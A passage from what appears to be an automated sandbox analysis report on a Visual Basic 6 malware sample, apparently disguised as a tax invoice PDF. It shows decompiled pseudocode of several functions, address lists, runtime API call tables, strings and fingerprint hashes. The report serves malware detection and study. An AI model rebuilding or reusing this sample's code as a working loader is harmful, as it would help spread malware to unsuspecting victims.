					_t111 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t134, _t134, _t108, _t134, _t107, _t134, _t134);
					asm("fclex");
					_v92 = _t111;
					if(_v92 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x411138);
						_push(_a4);
						_push(_v92);
						L00401690();
						_v136 = _t111;
					}
					_push( &_v48);
					_t98 =  &_v44;
					_push(_t98);
					_push(2);
					L00401654();
					L00401636();
				}
				asm("wait");
				_push(0x414b89);
				L0040165A();
				L0040165A();
				L0040165A();
				return _t98;
			}

0x0041483d
0x0041484c
0x00414856
0x0041485e
0x00414861
0x00414868
0x00414877
0x00414880
0x00414885
0x0041488c
0x00414893
0x00414895
0x00414897
0x00414899
0x0041489b
0x0041489e
0x0041489f
0x004148a9
0x004148b1
0x004148b6
0x004148b8
0x004148ba
0x004148bf
0x004148c4
0x004148cc
0x004148d9
0x004148f3
0x004148db
0x004148db
0x004148e0
0x004148e5
0x004148ea
0x004148ea
0x0041490e
0x00414912
0x00414917
0x00414926
0x0041492c
0x0041492e
0x00414935
0x00414951
0x00414937
0x00414937
0x0041493c
0x00414941
0x00414944
0x00414947
0x0041494c
0x0041494c
0x00414958
0x0041495b
0x00414962
0x00414965
0x0041496c
0x0041496f
0x00414970
0x0041497a
0x00414982
0x0041498a
0x0041498a
0x0041498f
0x00414994
0x0041499e
0x004149a3
0x004149a4
0x004149a9
0x004149b0
0x004149b6
0x004149bd
0x004149c2
0x004149c8
0x004149d5
0x004149ef
0x004149d7
0x004149d7
0x004149dc
0x004149e1
0x004149e6
0x004149e6
0x00414a00
0x00414a0a
0x00414a0e
0x00414a13
0x00414a22
0x00414a28
0x00414a2a
0x00414a31
0x00414a4d
0x00414a33
0x00414a33
0x00414a38
0x00414a3d
0x00414a40
0x00414a43
0x00414a48
0x00414a48
0x00414a51
0x00414a53
0x00414a55
0x00414a58
0x00414a5b
0x00414a5c
0x00414a61
0x00414a6a
0x00414a6b
0x00414a74
0x00414a81
0x00414a8b
0x00414a91
0x00414a97
0x00414a83
0x00414a83
0x00414a83
0x00414a9c
0x00414aad
0x00414ab6
0x00414abc
0x00414ac3
0x00414ac6
0x00414aca
0x00414acf
0x00414ad2
0x00414ad5
0x00414adc
0x00414ae6
0x00414af6
0x00414afc
0x00414afe
0x00414b05
0x00414b24
0x00414b07
0x00414b07
0x00414b0c
0x00414b11
0x00414b14
0x00414b17
0x00414b1c
0x00414b1c
0x00414b2e
0x00414b2f
0x00414b32
0x00414b33
0x00414b35
0x00414b40
0x00414b40
0x00414b45
0x00414b46
0x00414b73
0x00414b7b
0x00414b83
0x00414b88

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00414856
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00414880
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041489F
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004148A9
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004148B1
#709.MSVBVM60(ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004148C4
__vbaNew2.MSVBVM60(00411D38,0041A010,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004148E5
__vbaObjSet.MSVBVM60(?,00000000,?,?,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414912
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,00000188,?,?,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414947
#667.MSVBVM60(00000008,?,?,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414970
__vbaStrMove.MSVBVM60(00000008,?,?,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041497A
__vbaFreeObj.MSVBVM60(00000008,?,?,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414982
__vbaFreeVar.MSVBVM60(00000008,?,?,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041498A
#527.MSVBVM60(00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414994
__vbaStrMove.MSVBVM60(00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041499E
__vbaStrCmp.MSVBVM60(00411818,00000000,00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004149A9
__vbaFreeStr.MSVBVM60(00411818,00000000,00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004149BD
__vbaNew2.MSVBVM60(00411D38,0041A010,00411818,00000000,00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004149E1
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414A0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041181C,00000100), ref: 00414A43
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00414A5C
_adj_fdiv_m64.MSVBVM60(?,?,?,?,004014B6), ref: 00414A97
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,004014B6), ref: 00414AB6
__vbaI4Var.MSVBVM60(?,?,00000000,?,?,?,?,?,?,004014B6), ref: 00414ACA
__vbaHresultCheckObj.MSVBVM60(00000000,004011F0,00411138,000002C0), ref: 00414B17
__vbaFreeObjList.MSVBVM60(00000002,?,00000000), ref: 00414B35
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004014B6), ref: 00414B40
__vbaFreeStr.MSVBVM60(00414B89,00411818,00000000,00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414B73
__vbaFreeStr.MSVBVM60(00414B89,00411818,00000000,00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414B7B
__vbaFreeStr.MSVBVM60(00414B89,00411818,00000000,00411810,ABC,004117F8,000000FF,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00414B83

Strings

ABC, xrefs: 004148BF

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#527#667#703#709CallChkstkCopyLateList_adj_fdiv_m64
String ID: ABC
API String ID: 4279506577-2743272264
Opcode ID: de85551cc990ab416de1f042a19fb10038cc1476e1759e67bb6809e92236c233
Instruction ID: ef4660157af5980ab7c79ea32681dc2773e230e54e9d1651fe4470e6e0505594
Opcode Fuzzy Hash: de85551cc990ab416de1f042a19fb10038cc1476e1759e67bb6809e92236c233
Instruction Fuzzy Hash: 98910771900208AFCB04EFE1CD45BDDBBB8BF08314F24492AF111BB1A1DB795945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004140C4, Relevance: 45.3, APIs: 30, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E004140C4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				char _v108;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				intOrPtr _v164;
				intOrPtr _v172;
				intOrPtr _v180;
				intOrPtr _v188;
				void* _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				signed int _v228;
				signed int _v232;
				intOrPtr* _v236;
				signed int _v240;
				intOrPtr* _v244;
				signed int _v248;
				intOrPtr* _v252;
				signed int _v256;
				char* _t117;
				signed int _t120;
				char* _t125;
				short _t129;
				char* _t134;
				char* _t138;
				signed int _t142;
				signed int _t155;
				intOrPtr _t193;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t193;
				L004014B0();
				_v12 = _t193;
				_v8 = 0x401180;
				L00401684();
				L00401684();
				if( *0x41a010 != 0) {
					_v236 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v236 = 0x41a010;
				}
				_t117 =  &_v40;
				L0040169C();
				_v208 = _t117;
				_t120 =  *((intOrPtr*)( *_v208 + 0x180))(_v208, _t117,  *((intOrPtr*)( *((intOrPtr*)( *_v236)) + 0x368))( *_v236));
				asm("fclex");
				_v212 = _t120;
				if(_v212 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x411750);
					_push(_v208);
					_push(_v212);
					L00401690();
					_v240 = _t120;
				}
				L0040168A();
				_push( &_v60);
				L0040167E();
				_push( &_v76);
				L0040167E();
				_v132 = 1;
				_v140 = 2;
				_push(1);
				_push(1);
				_push( &_v76);
				_push( &_v140);
				_t125 =  &_v92;
				_push(_t125);
				L0040166C();
				_push(_t125);
				_push( &_v60);
				_push(0x411764);
				_push( &_v108);
				L00401672();
				_v148 = 1;
				_v156 = 0x8002;
				_push( &_v108);
				_t129 =  &_v156;
				_push(_t129);
				L00401678();
				_v208 = _t129;
				_push( &_v108);
				_push( &_v92);
				_push( &_v60);
				_push( &_v76);
				_push(4);
				L00401666();
				_t134 = _v208;
				if(_t134 != 0) {
					if( *0x41a010 != 0) {
						_v244 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v244 = 0x41a010;
					}
					_t138 =  &_v40;
					L0040169C();
					_v208 = _t138;
					_t142 =  *((intOrPtr*)( *_v208 + 0xb0))(_v208,  &_v36, _t138,  *((intOrPtr*)( *((intOrPtr*)( *_v244)) + 0x33c))( *_v244));
					asm("fclex");
					_v212 = _t142;
					if(_v212 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0xb0);
						_push(0x411730);
						_push(_v208);
						_push(_v212);
						L00401690();
						_v248 = _t142;
					}
					if( *0x41a31c != 0) {
						_v252 = 0x41a31c;
					} else {
						_push(0x41a31c);
						_push(0x411788);
						L00401696();
						_v252 = 0x41a31c;
					}
					_v216 =  *_v252;
					_v180 = 0x51d639;
					_v188 = 3;
					_v164 = 0x8cb0c;
					_v172 = 3;
					_v148 = 0x18;
					_v156 = 2;
					_v132 = 0x6285ce;
					_v140 = 3;
					_v228 = _v36;
					_v36 = _v36 & 0x00000000;
					_v52 = _v228;
					_v60 = 8;
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t155 =  *((intOrPtr*)( *_v216 + 0x44))(_v216, 0x10, 0x10, 0x10, 0x10, 0x10,  &_v44);
					asm("fclex");
					_v220 = _t155;
					if(_v220 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x411778);
						_push(_v216);
						_push(_v220);
						L00401690();
						_v256 = _t155;
					}
					_v232 = _v44;
					_v44 = _v44 & 0x00000000;
					_v68 = _v232;
					_v76 = 9;
					_push(0x10);
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L00401660();
					L0040168A();
					_push( &_v76);
					_t134 =  &_v60;
					_push(_t134);
					_push(2);
					L00401666();
				}
				_push(0x414502);
				L0040165A();
				L0040165A();
				L0040168A();
				return _t134;
			}

0x004140c9
0x004140d4
0x004140d5
0x004140e1
0x004140e9
0x004140ec
0x004140f9
0x00414104
0x00414110
0x0041412d
0x00414112
0x00414112
0x00414117
0x0041411c
0x00414121
0x00414121
0x00414151
0x00414155
0x0041415a
0x0041416e
0x00414174
0x00414176
0x00414183
0x004141a8
0x00414185
0x00414185
0x0041418a
0x0041418f
0x00414195
0x0041419b
0x004141a0
0x004141a0
0x004141b2
0x004141ba
0x004141bb
0x004141c3
0x004141c4
0x004141c9
0x004141d0
0x004141da
0x004141dc
0x004141e1
0x004141e8
0x004141e9
0x004141ec
0x004141ed
0x004141f2
0x004141f6
0x004141f7
0x004141ff
0x00414200
0x00414205
0x0041420f
0x0041421c
0x0041421d
0x00414223
0x00414224
0x00414229
0x00414233
0x00414237
0x0041423b
0x0041423f
0x00414240
0x00414242
0x0041424a
0x00414253
0x00414260
0x0041427d
0x00414262
0x00414262
0x00414267
0x0041426c
0x00414271
0x00414271
0x004142a1
0x004142a5
0x004142aa
0x004142c2
0x004142c8
0x004142ca
0x004142d7
0x004142fc
0x004142d9
0x004142d9
0x004142de
0x004142e3
0x004142e9
0x004142ef
0x004142f4
0x004142f4
0x0041430a
0x00414327
0x0041430c
0x0041430c
0x00414311
0x00414316
0x0041431b
0x0041431b
0x00414339
0x0041433f
0x00414349
0x00414353
0x0041435d
0x00414367
0x00414371
0x0041437b
0x00414382
0x0041438f
0x00414395
0x0041439f
0x004143a2
0x004143b0
0x004143bd
0x004143be
0x004143bf
0x004143c0
0x004143c4
0x004143d1
0x004143d2
0x004143d3
0x004143d4
0x004143d8
0x004143e5
0x004143e6
0x004143e7
0x004143e8
0x004143ec
0x004143f9
0x004143fa
0x004143fb
0x004143fc
0x00414400
0x0041440a
0x0041440b
0x0041440c
0x0041440d
0x0041441c
0x0041441f
0x00414421
0x0041442e
0x00414450
0x00414430
0x00414430
0x00414432
0x00414437
0x0041443d
0x00414443
0x00414448
0x00414448
0x0041445a
0x00414460
0x0041446a
0x0041446d
0x00414474
0x00414477
0x00414481
0x00414482
0x00414483
0x00414484
0x00414485
0x00414487
0x0041448a
0x00414492
0x0041449a
0x0041449b
0x0041449e
0x0041449f
0x004144a1
0x004144a6
0x004144a9
0x004144ec
0x004144f4
0x004144fc
0x00414501

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004140E1
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004140F9
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00414104
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 0041411C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414155
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411750,00000180), ref: 0041419B
__vbaFreeObj.MSVBVM60(00000000,?,00411750,00000180), ref: 004141B2
#610.MSVBVM60(?), ref: 004141BB
#610.MSVBVM60(?,?), ref: 004141C4
__vbaVarAdd.MSVBVM60(?,00000002,?,00000001,00000001,?,?), ref: 004141ED
#662.MSVBVM60(?,00411764,?,00000000,?,00000002,?,00000001,00000001,?,?), ref: 00414200
__vbaVarTstNe.MSVBVM60(00008002,?,?,00411764,?,00000000,?,00000002,?,00000001,00000001,?,?), ref: 00414224
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,00411764,?,00000000,?,00000002,?,00000001,00000001), ref: 00414242
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 0041426C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004142A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411730,000000B0), ref: 004142EF
__vbaNew2.MSVBVM60(00411788,0041A31C), ref: 00414316
__vbaChkstk.MSVBVM60(?), ref: 004143B0
__vbaChkstk.MSVBVM60(?), ref: 004143C4
__vbaChkstk.MSVBVM60(?), ref: 004143D8
__vbaChkstk.MSVBVM60(?), ref: 004143EC
__vbaChkstk.MSVBVM60(?), ref: 00414400
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000044), ref: 00414443
__vbaChkstk.MSVBVM60(00000000,?,00411778,00000044), ref: 00414477
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041448A
__vbaFreeObj.MSVBVM60(?,00000000), ref: 00414492
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000009,?,00000000), ref: 004144A1
__vbaFreeStr.MSVBVM60(00414502), ref: 004144EC
__vbaFreeStr.MSVBVM60(00414502), ref: 004144F4
__vbaFreeObj.MSVBVM60(00414502), ref: 004144FC

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$ChkstkFree$CheckHresultNew2$#610CopyList$#662Late
String ID:
API String ID: 2500057795-0
Opcode ID: c35f310fa4e48eafda746393a79db2115c9df99c5fe2d5e8100b929abe971ea4
Instruction ID: 380db7e8d9b92d2917b31ce8c049eb5db6ba6213471ec6cdc56bf027f2870d6d
Opcode Fuzzy Hash: c35f310fa4e48eafda746393a79db2115c9df99c5fe2d5e8100b929abe971ea4
Instruction Fuzzy Hash: DBB109719002199BDB20DF90CC45FDEB7B9BF08304F1045AAF509BB2A1DBB95AC88F65

Uniqueness

Uniqueness Score: -1.00%

Function 0041740D, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0041740D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				char* _t105;
				signed int _t111;
				char* _t115;
				signed int _t118;
				char* _t122;
				signed int _t126;
				char* _t130;
				signed int _t134;
				char* _t135;
				char* _t137;
				intOrPtr _t141;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;

				_t168 = _t167 - 0xc;
				 *[fs:0x0] = _t168;
				L004014B0();
				_v16 = _t168;
				_v12 = 0x401388;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x4014b6, _t165);
				if( *0x41a010 != 0) {
					_v120 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v120 = 0x41a010;
				}
				_t141 =  *((intOrPtr*)( *_v120));
				_t105 =  &_v32;
				L0040169C();
				_v104 = _t105;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t168 =  *0x401380;
				_t111 =  *((intOrPtr*)( *_v104 + 0x1cc))(_v104, _t141, 0x10, 0x10, 0x10, _t105,  *((intOrPtr*)(_t141 + 0x378))( *_v120));
				asm("fclex");
				_v108 = _t111;
				if(_v108 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x4117b8);
					_push(_v104);
					_push(_v108);
					L00401690();
					_v124 = _t111;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v128 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v128 = 0x41a010;
				}
				_t115 =  &_v32;
				L0040169C();
				_v104 = _t115;
				_t118 =  *((intOrPtr*)( *_v104 + 0x128))(_v104, _t115,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x30c))( *_v128));
				asm("fclex");
				_v108 = _t118;
				if(_v108 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x4118b4);
					_push(_v104);
					_push(_v108);
					L00401690();
					_v132 = _t118;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v136 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v136 = 0x41a010;
				}
				_t122 =  &_v32;
				L0040169C();
				_v104 = _t122;
				_v60 = 0x80020004;
				_v68 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t126 =  *((intOrPtr*)( *_v104 + 0x1ec))(_v104, L"domstolslignende", 0x10, _t122,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x310))( *_v136));
				asm("fclex");
				_v108 = _t126;
				if(_v108 >= 0) {
					_v140 = _v140 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4118a4);
					_push(_v104);
					_push(_v108);
					L00401690();
					_v140 = _t126;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v144 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v144 = 0x41a010;
				}
				_t130 =  &_v32;
				L0040169C();
				_v104 = _t130;
				_t134 =  *((intOrPtr*)( *_v104 + 0x158))(_v104,  &_v36, _t130,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x324))( *_v144));
				asm("fclex");
				_v108 = _t134;
				if(_v108 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x41181c);
					_push(_v104);
					_push(_v108);
					L00401690();
					_v148 = _t134;
				}
				_push(0);
				_push(0);
				_push(_v36);
				_t135 =  &_v52;
				_push(_t135);
				L00401618();
				_push(_t135);
				L0040160C();
				_v28 = _t135;
				_push( &_v36);
				_t137 =  &_v32;
				_push(_t137);
				_push(2);
				L00401654();
				L00401636();
				asm("wait");
				_push(0x41776e);
				return _t137;
			}

0x00417410
0x0041741f
0x00417429
0x00417431
0x00417434
0x0041743b
0x0041744a
0x00417454
0x0041746e
0x00417456
0x00417456
0x0041745b
0x00417460
0x00417465
0x00417465
0x0041747f
0x00417489
0x0041748d
0x00417492
0x00417495
0x0041749c
0x004174a3
0x004174aa
0x004174b1
0x004174b8
0x004174c2
0x004174cc
0x004174cd
0x004174ce
0x004174cf
0x004174d3
0x004174dd
0x004174de
0x004174df
0x004174e0
0x004174e4
0x004174ee
0x004174ef
0x004174f0
0x004174f1
0x004174f9
0x00417504
0x0041750a
0x0041750c
0x00417513
0x0041752f
0x00417515
0x00417515
0x0041751a
0x0041751f
0x00417522
0x00417525
0x0041752a
0x0041752a
0x00417536
0x00417542
0x0041755c
0x00417544
0x00417544
0x00417549
0x0041754e
0x00417553
0x00417553
0x00417577
0x0041757b
0x00417580
0x0041758b
0x00417591
0x00417593
0x0041759a
0x004175b6
0x0041759c
0x0041759c
0x004175a1
0x004175a6
0x004175a9
0x004175ac
0x004175b1
0x004175b1
0x004175bd
0x004175c9
0x004175e6
0x004175cb
0x004175cb
0x004175d0
0x004175d5
0x004175da
0x004175da
0x0041760a
0x0041760e
0x00417613
0x00417616
0x0041761d
0x00417627
0x00417631
0x00417632
0x00417633
0x00417634
0x00417642
0x00417648
0x0041764a
0x00417651
0x00417670
0x00417653
0x00417653
0x00417658
0x0041765d
0x00417660
0x00417663
0x00417668
0x00417668
0x0041767a
0x00417686
0x004176a3
0x00417688
0x00417688
0x0041768d
0x00417692
0x00417697
0x00417697
0x004176c7
0x004176cb
0x004176d0
0x004176df
0x004176e5
0x004176e7
0x004176ee
0x0041770d
0x004176f0
0x004176f0
0x004176f5
0x004176fa
0x004176fd
0x00417700
0x00417705
0x00417705
0x00417714
0x00417716
0x00417718
0x0041771b
0x0041771e
0x0041771f
0x00417727
0x00417728
0x0041772d
0x00417733
0x00417734
0x00417737
0x00417738
0x0041773a
0x00417745
0x0041774a
0x0041774b
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00417429
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00417460
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041748D
__vbaChkstk.MSVBVM60(?,00000000), ref: 004174C2
__vbaChkstk.MSVBVM60(?,00000000), ref: 004174D3
__vbaChkstk.MSVBVM60(?,00000000), ref: 004174E4
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,000001CC,?,?,00000000), ref: 00417525
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 00417536
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,00000000), ref: 0041754E
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000000), ref: 0041757B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,00000128,?,?,00000000), ref: 004175AC
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004175BD
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,00000000), ref: 004175D5
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000000), ref: 0041760E
__vbaChkstk.MSVBVM60(?,00000000,?,?,00000000), ref: 00417627
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118A4,000001EC,?,?,00000000), ref: 00417663
__vbaFreeObj.MSVBVM60(?,?,?,?,00000000), ref: 0041767A
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,00000000), ref: 00417692
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00000000), ref: 004176CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041181C,00000158,?,?,?,?,00000000), ref: 00417700
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 0041771F
__vbaI4Var.MSVBVM60(00000000,?,?,?,004014B6), ref: 00417728
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,00000000,?,?,?,004014B6), ref: 0041773A
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,004014B6), ref: 00417745

Strings

domstolslignende, xrefs: 00417635

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$ChkstkFree$CheckHresultNew2$CallLateList
String ID: domstolslignende
API String ID: 235934366-361804011
Opcode ID: 308fb1e7603f5bea17e39b31796faa443f75fe92a3ccc60dcdf172698b32217d
Instruction ID: b4c05a88b12e3c4817cf3a610f0a2d912dcb538e3416b73a0049c5163e023ac5
Opcode Fuzzy Hash: 308fb1e7603f5bea17e39b31796faa443f75fe92a3ccc60dcdf172698b32217d
Instruction Fuzzy Hash: BAA1F870900308EFDB10DFA4C889BDDBBB5BF09304F20496AE505BB2A1CBB95995DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00417007, Relevance: 40.8, APIs: 27, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00417007(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _t126;
				char* _t130;
				signed int _t134;
				signed int _t138;
				char* _t143;
				intOrPtr _t150;
				char* _t154;
				signed int _t157;
				char* _t158;
				char* _t162;
				signed int _t166;
				signed int _t169;
				void* _t195;
				void* _t197;
				intOrPtr _t198;

				_t198 = _t197 - 0xc;
				 *[fs:0x0] = _t198;
				L004014B0();
				_v16 = _t198;
				_v12 = 0x401370;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014b6, _t195);
				L00401684();
				if( *0x41a010 != 0) {
					_v132 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v132 = 0x41a010;
				}
				_push( *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x384))( *_v132));
				_t126 =  &_v48;
				_push(_t126);
				L0040169C();
